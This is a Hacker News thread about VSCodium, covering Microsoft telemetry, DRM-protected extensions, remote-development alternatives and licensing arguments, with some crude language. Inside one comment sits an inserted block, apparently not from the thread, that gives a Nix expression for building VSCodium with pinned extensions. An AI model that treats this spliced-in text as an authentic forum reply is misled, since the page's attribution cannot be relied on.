| and it shits on real journalism by giving all the attention
| to clickbaits.
|
| I suspect every time I've responded to such clickbaits
| might be more problematic than all the data they get from
| all my smart devices in a year...
|
| Protecting one's privacy because of societal harm is a
| worthy thing but also a pretty big effort and I sure don't
| have a solution, or even any confident prediction of how
| big the problem is or where it's coming from...
|
| But I probably won't truly be worried unless one of those
| horrid encryption bans gets close to passing.
| pulpfictional wrote:
| > The majority of people seem to have immediate-scoped
| concerns I suppose.
|
| Well, like you write, aggregated data is already being
| used to influence populations which makes it immediate.
| A hypothetical hacker is not.
|
| > Most of the really scary big data possibilities seems
| more like political issues than data issues, the data is
| just something they could use to do the things people are
| worried about.
|
| I don't follow. Not giving away the data removes the need
| for politics. Crime is illegal nevertheless it exists
| because it is possible to commit.
|
| > It's not great, but it's competing for mind share with
| a lot of other possible horrors people are afraid of and
| people are rather fatigued.
|
| Not everyone shares the same concerns and nobody likes
| problems, that doesn't mean they should be accepted.
|
| > The more subtle stuff they're already doing seems like
| it would be a problem with even the most basic data.
|
| All the more reason not to give them more. The
| personalized hate content is a direct consequence of big
| data aggregation.
|
| All in all, seems like more of an issue than a possible
| compromise of a FOSS project.
| yjftsjthsd-h wrote:
| > Telemetry is disabled.
|
| Er...
|
| https://github.com/VSCodium/vscodium/blob/master/DOCS.md#dis...
|
| > Even though we do not pass the telemetry build flags (and go
| out of our way to cripple the baked-in telemetry), Microsoft will
| still track usage by default.
| [deleted]
| pests wrote:
| I think it's just badly worded.
| nate-sys wrote:
| It's on brand.
| gostsamo wrote:
| MS eliminated any competition from this direction by limiting
| their main extensions to the official release only. I'm
| personally using the remote extensions quite a lot and if someone
| can provide an alternative there, it would be great.
| andrepd wrote:
| I think the alternative is just not using VS code. I use it at
| work, because it is officially supported by the IT dept and I
| don't care about tracking. But for my personal work I still use
| sublime.
| seabrookmx wrote:
| Sublime is not a real alternative though if you rely on
| VSCode's remote extensions.
| andrepd wrote:
| Ah fair, I don't use that for my personal work anywhere
| though, so it's not an issue for me.
| mardifoufs wrote:
| The remote extension on jetbrains is not even remotely
| comparable to even just the base remote ssh vscode. Much
| less the remote container, dev container and tunnels
| (plus stuff like one click integration to Azure)
| gostsamo wrote:
| sublime is not accessible with my screen reader
| Liquix wrote:
| There is a section in the docs regarding switching back to the
| official extension marketplace:
| https://github.com/VSCodium/vscodium/blob/master/DOCS.md#how...
|
| So if there is a "killer extension" not available on codium's
| marketplace, you can still use it through microsoft's
| marketplace.
| circuit10 wrote:
| You can also download the vsix file from the website and load
| it in
| foob wrote:
| You can switch the extension marketplace, but Microsoft uses
| DRM in their extensions to prevent them from running with
| non-proprietary builds [1]. Pylance, their Python LSP, is one
| notable example [2]. Their earlier Python LSP was open
| source, but the community forks have lost a lot of the wind
| in their sails because such a large portion of developers use
| VS Code without realizing or caring that the LSP is DRM-laden
| and closed source. I believe the traditional term for this is
| _embrace, extend, extinguish._
|
| [1] - https://parsiya.net/blog/2021-12-20-rce-in-visual-
| studio-cod...
|
| [2] - https://github.com/microsoft/pylance-release/issues/746
| cypress66 wrote:
| Wow, vscode extensions having drm is insane
| vladvasiliu wrote:
| This alone, to me, means that MS is up to something
| shady. Maybe not right now, maybe not tomorrow, but it's
| surely on their roadmap.
|
| I don't see why they'd put out an open-source app, whose
| most useful extensions only work if you accept a closed
| binary known to phone home.
|
| I can see them trying to win goodwill from devs and steer
| them to their Azure/Windows offerings by releasing such
| an editor. But why insist on this telemetry-laden
| distribution, which is still free-as-in-beer?
| bitwize wrote:
| You know the "Editor Wars" meme? That was a thing because
| vim and Emacs were the _canonical_ editors; you could
| expect just about every serious hacker (in a Unix
| environment) to main either one or the other.
|
| Today, there is only one canonical editor: Visual Studio
| Code. 75% of professional programmers use it. Microsoft
| was trying to get the open source crowd back into their
| tooling fold -- and they've succeeded! Which means now
| they have a hugely expanded developer base to sell tools
| and services to. Remember their money is now in cloud,
| not desktop software -- so think things like GitHub
| Codespaces. (The entire devcontainer ecosystem comes from
| Microsoft and is oriented specifically around Visual
| Studio Code's model of remote development.)
| vladvasiliu wrote:
| Sure I do, and I enjoy flaming the occasional Emacs user
| I cross paths with.
|
| But why does selling those features, especially the ones
| requiring a separate cloud subscription, require a
| specific build of an app which is otherwise open source?
| bitwize wrote:
| Flip it on its head, the question is, why even do an open
| source release? The answer is, it's pretty much a sop,
| much like Apple's Darwin releases or the AOSP. Good PR
| for the open source community to build trust and good
| will, while still controlling the whole platform from
| soup to nuts making EEE possible. If they opened up their
| dev tools -- their LSPs and cloud service connectivity --
| to just anybody they risk losing that control.
|
| Honestly, the more I learn about Visual Studio Code the
| more I understand why Emacs is the way it is. Stallman
| was trying to keep it fully hackable forever.
| vladvasiliu wrote:
| I admit, I didn't think about it under that angle.
|
| But I do wonder how much VS Code being "kinda open
| source" mattered. I may be in an MS-centric bubble, but
| most people I interact with couldn't care less about
| that. They're using closed-source software all over.
| Their main reasons for switching to VS Code seem to be
| the _free-as-in-beer_ part, and that it's more practical
| than the OG VisualStudio. They're 99% Windows devs.
| nerdponx wrote:
| Upsells like Copilot, telemetry data mining, investing in
| the goodwill of an entire generation of programmers, and
| presumably further plans related to enterprise products.
| foob wrote:
| This is separate from the telemetry, but I suspect that
| part of the roadmap is for LSP extensions to become
| monthly subscription services eventually. We currently
| see hints of that from two directions: 1) the
| introduction of GitHub Copilot as a paid service, and 2)
| the aforementioned move towards proprietary and DRM
| protected LSPs. It's not hard to imagine how these two
| might converge in the future. I'm sure that the
| performance of these LSPs will be extremely impressive
| and that it will be rational for many individual
| developers to pay for them. This will in turn pull mind
| share and community involvement away from FOSS solutions,
| and the gap between the two will widen over time as a
| result.
| vladvasiliu wrote:
| Oh, I'm not at all against companies making a buck
| selling software. I'm a happy JetBrains customer for my
| IDE needs, and I'm not even a "professional" developer.
|
| But why would they force the use of their "official" VS
| Code build for this? Couldn't they just charge for their
| "impressive" plugins, regardless of the edition of VS
| Code used? The JetBrains "community" IDEs (open source
| and gratis) can use paid plugins from their marketplace.
| foob wrote:
| I'm not against selling developer tools either, but I do
| have a problem with EEE as a strategy. As far as I know,
| JetBrains has never engaged with this behavior and they
| have coexisted in a healthy way with fully open source
| alternatives. The point of Microsoft's strategy isn't to
| only produce a better product, but to actively hurt open
| alternatives by driving down their adoption through
| insidious and disingenuous means. They're not just trying
| to compete in the market, they're trying to monopolize
| it.
|
| The idea behind LSP and Microsoft's initial open source
| work on LSP were both excellent. That launched seven
| years ago, and I don't think that we would have seen the
| near universal adoption of LSP among open source editors
| nor the dominance of VS Code among developers if they had
| been paid products from the start. Now that they have a
| large enough market share, they can make the LSP engines
| proprietary without most developers even noticing. The
| gap between the proprietary and open source solutions can
| now be widened both by the open source community
| shrinking and by Microsoft pumping money into improving
| their LSP engines. The more that gap widens, the more
| people migrate to VS Code from open alternatives. That
| becomes a self-reinforcing loop.
|
| Once VS Code is significantly better than open source
| alternatives and they have a huge market share, Microsoft
| is in a very strong position to start collecting rent.
| Switching costs on an editor are nontrivial to begin
| with, and are enhanced by the induced atrophy of open
| source alternatives. Despite the fact that this strategy
| takes more than a decade to execute, I would guess that
| it ends better for Microsoft overall than if they were to
| start charging for VS Code back in 2016.
| nerdponx wrote:
| Maybe instead of "embrace, extend, extinguish", it's
| "promote, extend, prevent competitors from extending,
| then charge for extensions".
|
| Paid monthly premium LSP subscription honestly would be a
| great idea from a business perspective, even though it's
| distasteful.
| croes wrote:
| It's just MS as we know it.
|
| They didn't really change, they just got better at PR.
| mcpackieh wrote:
| Seems like every generation has to learn the hard way.
| CameronNemo wrote:
| Developers! Developers!! DEVELOPERS!!! DEVELOPERS!!!!
| juniperplant wrote:
| https://youtu.be/XxbJw8PrIkc?si=1FUhvPxAu4kKdwvX
| CameronNemo wrote:
| I didn't link to it because you can't unsee Ballmer and
| unhear his voice cracks.
| jeanp413 wrote:
| There's https://open-vsx.org/extension/jeanp413/open-remote-ssh
| and https://open-vsx.org/extension/jeanp413/open-remote-wsl
| tecoholic wrote:
| Yup. I tried Codium and gave up after I couldn't connect to the
| docker containers for debugging. It's pretty much the only use
| for VS Code I have and Codium can't do that.
| pama wrote:
| I hope that more people try Emacs after having had exposure to
| vscode. It may be slow to get to know the new environment, and
| reading the manual only takes one so far, but everything
| becomes nicer after the training phase. Text-based remote
| editing has been mature in this platform for decades, and it
| keeps working well with the addition of all the language
| servers and tree sitters and so on. It is now snappy again in
| all architectures, it has built-in support for sql and still
| uses the powerful lisp for all its extensions.
| hedora wrote:
| Today is your lucky day!
|
| "Open Remote - SSH" by "jeanp413" aka: @ext:jeanp413.open-
| remote-ssh
|
| works just like the closed source one, at least for me.
|
| I'm using the vscodium AUR package under manjaro. I got the
| extension from whatever store vscodium defaults to. I'm not
| sure if it is available in Microsoft's store.
|
| The extension didn't work for me under Code - OSS (there was an
| apparent configuration error, and I didn't bother tracking it
| down).
| gostsamo wrote:
| thanks, will check it out
| zikduruqe wrote:
| Mine broke a few weeks ago (MacOS - Open Remote - SSH
| v0.0.42). What version are you running and are you connecting
| to your remote hosts via your ssh config file or using
| username@ip?
|
| Just curious, since I cannot get it to connect to any hosts.
| api wrote:
| The alternative is Jetbrains, Nova, vim, etc.
| rahoulb wrote:
| I don't know about JetBrains but I have tried to replicate my
| VSCode + Remote Containers extension workflow in vim and Nova
| (which I absolutely love) and not got anywhere near.
| HankB99 wrote:
| If I switch from VS Code to VSCodium, will I notice anything
| different - assuming the telemetry is not really visible to me
| and I ignore the branding?
|
| Will the plugins - some provided by MS - still work as expected
| or will those be blocked or hobbled?
|
| Thanks!
| BossingAround wrote:
| From my experience, the UI is very slightly different, with
| some options/functionality missing here and there (from what I
| remember, for example, you couldn't enlarge the font size of
| the menus).
|
| The plugins won't work out of the gate, but you can install
| them manually and most of them will work.
|
| It's not a 1:1 replacement, and from my limited experience, the
| UX of VSCodium was worse than that of VSCode. But, if you value
| not being tied to MS... That's the price you're gonna pay.
| hedora wrote:
| Are you sure you weren't using an older version of one? I see
| no practical difference between code on macos and vscodium on
| Linux (except that I prefer Linux's font renderer, and the
| ctrl key moved).
| codethief wrote:
| In my experience all extensions will work & will be installable
| right from the in-app marketplace, provided that you follow
| https://news.ycombinator.com/item?id=37382473
|
| There was a ticket somewhere in the issue tracker with more
| information about this topic.
| whalesalad wrote:
| Remote SSH dev does not work.
| jeanp413 wrote:
| There's https://open-vsx.org/extension/jeanp413/open-remote-
| ssh it works in most cases
| hedora wrote:
| I'm using that, and haven't noticed any differences between
| vscodium and the closed source one (other than the removal
| of telemetry).
| replete wrote:
| I switched to vscodium two years ago and I haven't had any
| problems
| wheelerof4te wrote:
| > Will the plugins - some provided by MS - still work as
| expected or will those be blocked or hobbled?
|
| Nope. Only some.
| trelane wrote:
| What about the other way: will plugins designed for VSCodium
| work in VSCode?
| ReleaseCandidat wrote:
| There is no such thing as "designed for VSCodium". You can
| publish your extension on Open VSX only instead of in the
| MS Marketplace.
| trelane wrote:
| > You can publish your extension on Open VSX only instead
| of in the MS Marketplace.
|
| So to use an extension in VSCode, it has to be published
| in Microsoft's store? And VSCode only in this other
| store?
| ReleaseCandidat wrote:
| > So to use an extension in VSCode, it has to be
| published in Microsoft's store?
|
| You can always download the extension (or build it
| yourself) and install it manually - using Code or Codium.
| You can use the Open VSX registry with Code, but you have
| to configure it:
| https://github.com/eclipse/openvsx/wiki/Using-Open-VSX-
| in-VS.... So it technically does not have to be in MS'
| Marketplace, but 99% of Code users will not find or know
| of your extension, if it isn't in the Marketplace.
| hooverd wrote:
| Pylance won't. There's the EEE you're looking for.
| codethief wrote:
| IIRC there was a ticket somewhere in the issue tracker where
| someone explained in the comments how to get Pylance to work.
| Wasn't particularly difficult.
| CameronNemo wrote:
| Just use the open source python LSP that is written in
| Python and maintained by the Spyder IDE team.
|
| https://github.com/python-lsp/python-lsp-server
|
| Someone might come along and tell you that you are missing
| out on some pylance features, but fuck closed source dev
| tooling it ain't worth it.
| hooverd wrote:
| For now. Who knows how long it be before it only runs
| against a signed Microsoft VSCode binary?
| wheelerof4te wrote:
| So, this is basically what you would get when you download and
| build Visual Studio Code's source code.
|
| The name is probably a wordplay similar to Chrome -> Chromium.
| A mini rant, if I may:
|
| Microsoft's (and Google's, lol) practice of "open-sourcing" their
| products, but releasing a product which has "an added closed-
| source functionality" is dishonest at best and worthy of a giant
| lawsuit at worst.
| o1y32 wrote:
| "worthy of a giant lawsuit"
|
| Wow, that's a bold claim. Unless vscode and other products are
| improperly using GPL-licensed or not following license
| requirements otherwise -- which I am not aware of -- Microsoft
| is doing nothing wrong here, just like countless other
| commercial companies that release proprietary software based on
| open source projects.
| Matumio wrote:
| Pretty sure they use "open source" in a fair way here. Others
| are able to grab their sources and legally publish builds that
| are pretty much identical (up to the telemetry...).
|
| What you're looking for is the "anti-features" distinctions,
| like the F-Droid store does it. E.g. "This app depends on other
| non-free apps." or "Promotes or depends entirely on a non-free
| network service."
| josephcsible wrote:
| > builds that are pretty much identical
|
| Not quite. Try running Pylance on a build of your own.
| jraph wrote:
| Not to mention that you are not supposed to use the
| official vscode extension repository if you don't use the
| official vscode build IIRC.
| candiddevmike wrote:
| It's the open enshittification model
| paulryanrogers wrote:
| How so? If it remains consistently open core then I don't see
| it. They'd have to make the open part progressively worse.
| hedora wrote:
| It is a platform play, where the platform increasingly
| becomes incompatible with the open core stuff.
|
| The value of a lot of software comes from interoperability,
| not from the code itself.
|
| For instance, try running AOSP and 100% open source system
| libraries on your android phone for a month. You will find
| that you cannot perform basic financial transactions, like
| paying for parking, or hailing an uber/lyft, fast-charge
| your car, attend concerts without paying an extra fee, etc,
| etc.
|
| I don't even want my phone to support any of the above
| crap, but I don't get to dictate how the US economy is
| structured, so I have no choice but to need all that stuff
| to work.
| lozenge wrote:
| It is progressively worse now.
|
| What used to be useful extras are now considered essentials
| (see how many on this thread say they need the SSH, Docker
| or WSL extensions and can't use VSCodium).
|
| Plus they're now moving Python, .NET and other specific
| extensions towards closed source. Yeah, you can use the
| open source versions, but they don't have mindshare any
| more so source code written with one might not
| navigate/display as well with the other.
|
| Also, new features only land when MS has a closed source
| idea that can use it, and are locked to MS extensions only.
| Innovation for me, not for thee. (Copilot/Continue on
| Codespaces/Live Share/VS Code Web/...)
| wheelerof4te wrote:
| "Plus they're now moving Python, .NET and other specific
| extensions towards closed source."
|
| They are also adding Python support to Excel, which means
| that the layman now has an intuitive way to use a Python
| function to plot graphs inside their favorite workbook.
|
| In other words, now you no longer need those extra
| machine learning Python devs, when Bob the accountant can
| plot fancy graphs for you.
|
| Talk about extending an open source project just to
| incorporate it into the Borg that is closed-source Excel.
| bmitc wrote:
| What is dishonest about it, and what would you sue them for? I
| don't think you can sue for "open sourced a product and
| released it for free but it's not what I like".
| wheelerof4te wrote:
| "open sourced a product and released it for free but it's not
| what I like"
|
| Open sourced a product and released a different product that
| has built-in tracking, is a walled garden for extensions and
| who knows what else.
|
| An elaborate fraud.
| djbusby wrote:
| Where is the fraud?
| wheelerof4te wrote:
| Let us imagine there is one chocolate product.
|
| The producer gives you two options to acquire that
| chocolate.
|
| First option is a pile of ingredients, a plain plastic
| wrapper and a recipe. You are obviously required to make
| the chocolate yourself, but what you get is the original
| chocolate as advocated by the company.
|
| Second option is a finished product that has a pretty
| decorated package and tastes a bit different than
| original chocolate. You can't quite put your finger on
| why, but at least you don't have to make it yourself!
|
| Maybe "fraud" is a bit too strong a word. We could go with
| "consumer deceit" instead.
| paulryanrogers wrote:
| They don't claim to be entirely open, and open isn't a
| regulated term regardless.
| stonogo wrote:
| Being within the bounds of literal and legal correctness
| and acting like an asshole, it turns out, are not
| incompatible!
| paulryanrogers wrote:
| I don't see this as asshole behavior. They're giving away
| an overwhelming amount for free, which the community or a
| competitor can build upon at any time. This project being
| an example.
|
| For those who find the closed capabilities and extensions
| distasteful there is opportunity to make their own.
| stonogo wrote:
| I've got several decades of experience with the things
| Microsoft has given away for free. I consider this to be
| an (entirely on-brand and consistent) asshole move, part
| of the same EEE cycle we've been through a dozen times
| with a dozen product lines. It's enough to keep me off
| even the open-source rebuild of the product.
| bmitc wrote:
| https://code.visualstudio.com/docs/getstarted/telemetry
|
| The point of this comment is that the telemetry is
| documented and able to be disabled.
| rstat1 wrote:
| People don't really care about facts. Only the next thing
| to be outraged by.
| jzb wrote:
| The source is available. You have the right to fork it. If
| there's something in the propriety release that's harmful,
| you might have a case - but all Microsoft is doing here is
| counting on people being willing to consume the builds
| rather than coming together to use the source code.
|
| Basically: Microsoft is betting that people care more about
| free as in beer than exercising software freedom. So far,
| they seem to be correct.
| TheRealPomax wrote:
| This is literally what the MIT license is for: it lets
| people take the source code, _modify it_, and then
| distribute that. As a paid product even, if that's what you
| want to do.
|
| This isn't fraud, this is literally MS going "here's the
| MIT licensed version, and here's our own variant of that,
| based on obeying that license." And then they go one step
| further and say "We're not going to tell you that only our
| product exists, we are explicitly telling you where to get
| the MIT licensed source code, which isn't even an MIT
| license requirement".
|
| This is _exactly_ what good open source practices look
| like.
| mcpackieh wrote:
| It's a typical and completely compliant way to use the
| MIT license, but _good_ open source practice? I don't
| think so. The MIT license permitting this sort of thing
| is why I and many others consider the MIT license to be a
| "cuck license":
|
| > _A Cuck License is a permissive software license that
| does not enforce the freedom of derivative works.
| This means that anyone can take software licensed under a
| Cuck License and turn it into proprietary software,
| effectively cucking the original author._
|
| > _Examples of Cuck Licenses are the MIT license and BSD
| license._
|
| > _Cuck License consequences:_
|
| > _There have been instances where developers' usage of
| Cuck Licenses has backfired. One notable example is
| Andrew Tanenbaum's MINIX, which got taken by Intel and
| turned into spyware called the Intel Management Engine.
| Tanenbaum went on to say:_
|
| > _"Many people (including me) don't like the idea of an
| all-powerful management engine in there at all (since it
| is a possible security hole and a dangerous idea in the
| first place), but that is Intel's business decision and a
| separate issue from the code it runs. A company as big as
| Intel could obviously write its own OS if it had to."_
|
| > _However, Tanenbaum maintains that he made the correct
| choice licensing MINIX under the 3-clause BSD License._
|
| https://wiki.installgentoo.com/wiki/Cuck_license
| bmitc wrote:
| That's implying that GPL is the only good license?
| mcpackieh wrote:
| No, any copyleft license is a better open source license.
| In fact, proprietary licenses are better as well; with
| MIT or BSD licenses you are writing code that a
| corporation will make proprietary, effectively writing
| proprietary code for them, except you don't get paid for
| it. It would be better to use a proprietary license and
| get paid than to use the BSD/MIT license, have your code
| turned into that same proprietary product, and not even
| get paid for it.
|
| Even giving your code to the public domain is better than
| an MIT or BSD license; corporations will still be able to
| make it proprietary but at least it clears the air around
| the 'interesting question' of mixing MIT/BSD code into a
| copyleft project and distributing the whole lot under a
| copyleft license.
| uw_rob wrote:
| Quality contribution to the collective knowledge of
| humanity by the installgentoo wiki.
| o1y32 wrote:
| You can have this rant as you please but that doesn't
| change the fact that Microsoft is following what the
| license requires and did nothing wrong.
| croes wrote:
| The part of hindering access to the market place and DRMing
| some extensions is the dishonest part.
| jodrellblank wrote:
| _Their_ marketplace, not _the_ marketplace. Their
| extensions. Microsoft's extensions for Microsoft's editor
| shared in Microsoft's marketplace. And if it's dishonest,
| where did they say otherwise?
| croes wrote:
| Microsoft's marketplace but definitely not all extensions
| are theirs.
|
| What is the reason that Codium can't access the
| extensions? That's like if Edge weren't allowed to load
| extensions from the Chrome store.
| coliveira wrote:
| You're 100% correct. Google and Apple started this trend, and
| MS perfected it: just say you're creating "open source"
| products, but release a closed source version. These mega
| companies still benefit from the work of clueless software
| engineers who donate their time to the open source product, but
| what the mega corps deliver to end users is the closed source
| version.
| o1y32 wrote:
| Nothing "clueless", I don't know what you are talking about.
| If people release/contribute to code under MIT license, they
| are very well aware that anyone on any projects -- open
| source projects, proprietary software -- can use their code
| as long as there is a copy of the copyright notice. Otherwise
| they should release it under GPL or something similar, or
| spend their time elsewhere. It's all clear and fair game and
| working as intended for decades.
| knallfrosch wrote:
| I wasn't clueless when I built a tiny functionality into
| Code-OSS and I'm fine with Microsoft (or M$?) slapping
| telemetry on VSCode. You know, the crash reporter and usage
| statistics are the foundation of this incredible
| product/software. People use that software for free and they
| can disable telemetry at any time.
|
| I'd rather work a week on VSCode for free than spend a day
| looking at Jetbrains' Java font rendering or waiting for
| Visual Studio to start.
| drcongo wrote:
| Serious question - no snark just genuine ignorance, what
| products have Google and Apple done this with?
| kiwijamo wrote:
| Google - Android. Apple - Darwin, Webkit, etc.
| Liquix wrote:
| Apple released OS X/Darwin open source, but kept the
| moneymaking frameworks (cocoa, carbon) closed source. This
| generated positive PR while keeping the secret sauce needed
| to ship polished applications under lock and key
|
| Google released Android open source, but then made
| unlocking bootloaders and flashing devices as difficult as
| possible for laymen. So they get to point at AOSP and say
| "open source" but in practice the vast majority of users
| end up running proprietary builds with big G's telemetry
| baked in
| dataangel wrote:
| This is just incorrect regarding Google. The phones they
| actually make, the Pixel ones, have open bootloaders.
| noman-land wrote:
| Chromium also?
| travisgriggs wrote:
| I use both VSCode and VSCodium. For a simple and pragmatic
| reason. Configuration management and multiple distinguishable
| windows.
|
| My VSCode is completely subsumed by the butt load of extensions
| that seems to be necessary to do work with
| Microchip/Atmel/Zephyr.
|
| And I use VSCodium for ansible/elixir work.
| the_biot wrote:
| That seems pretty elaborate just to maintain two different
| environments.
|
| Doesn't VSCodium have something like browser profiles, where
| you can customize all kinds of things only in that profile? I
| use this in Firefox all the time, windows looks different etc.
| merdaverse wrote:
| They recently added profiles in VSCode for this very use
| case. I have a bunch of them configured for different tech
| stacks (they only differ by extensions)
| orangea wrote:
| I'm not sure if VS Codium has profiles like that, but Nix can
| be used to create them. There is support for configuring an
| installation of VS Code in the Nix language and using it as a
| package.
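| As an added illustration of the Nix approach mentioned above (this is
| my own example, not code from the thread, from VSCodium or from
| nixpkgs docs): one Nix expression that builds VSCodium with a fixed,
| declarative extension set. The supply-chain point is that every
| extension is pinned to an exact version and content hash, so neither
| the editor's auto-update nor a changed marketplace upload can silently
| alter what runs in your editor. The attribute names
| (`vscode-with-extensions`, `vscodium`, `vscode-extensions`,
| `vscode-utils.extensionsFromVscodeMarketplace`) are nixpkgs attributes
| as I know them; the marketplace entry's name, publisher, version and
| hash are placeholders you must replace, and `lib.fakeSha256` is used
| deliberately so the first build fails and prints the real hash.

```nix
# Added example, not from the thread or from VSCodium/nixpkgs documentation.
# Builds VSCodium (telemetry-free base) with a pinned extension set.
{ pkgs ? import <nixpkgs> { } }:

let
  inherit (pkgs) lib;

  # Extensions packaged in nixpkgs itself. Their version is fixed by the
  # nixpkgs revision you evaluate against, so pin that revision too
  # (e.g. via a flake lock or a niv/npins-style pinned channel).
  nixpkgsExtensions = with pkgs.vscode-extensions; [
    ms-python.python
  ];

  # Extensions fetched straight from the Microsoft marketplace. Each one is
  # pinned to an exact version and a content hash; if the upload changes,
  # the build fails instead of silently installing different code.
  # ASSUMPTION: name/publisher/version are placeholders for illustration.
  marketplaceExtensions = pkgs.vscode-utils.extensionsFromVscodeMarketplace [
    {
      name = "some-extension";   # placeholder: extension identifier
      publisher = "some-publisher"; # placeholder: publisher identifier
      version = "0.0.0";         # placeholder: the exact version to pin
      # fakeSha256 makes the first build fail and print the real hash;
      # paste that hash here and rebuild.
      sha256 = lib.fakeSha256;
    }
  ];
in
# Swap the base editor from VS Code to VSCodium while keeping the same
# extension wiring; the result is a wrapper under result/bin.
pkgs.vscode-with-extensions.override {
  vscode = pkgs.vscodium;
  vscodeExtensions = nixpkgsExtensions ++ marketplaceExtensions;
}
```

| Save it as, say, `vscodium.nix` and run `nix-build vscodium.nix`; the
| marketplace entry will fail once with a hash mismatch, and after you
| paste in the reported hash the build is reproducible. Because the
| extension list lives in the derivation, the editor has no extension
| directory of its own to mutate, which is the same "profiles only differ
| by extensions" setup the earlier comment describes, but enforced by
| the package rather than by editor state.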
___________________________________________________________________
(page generated 2023-09-04 23:00 UTC)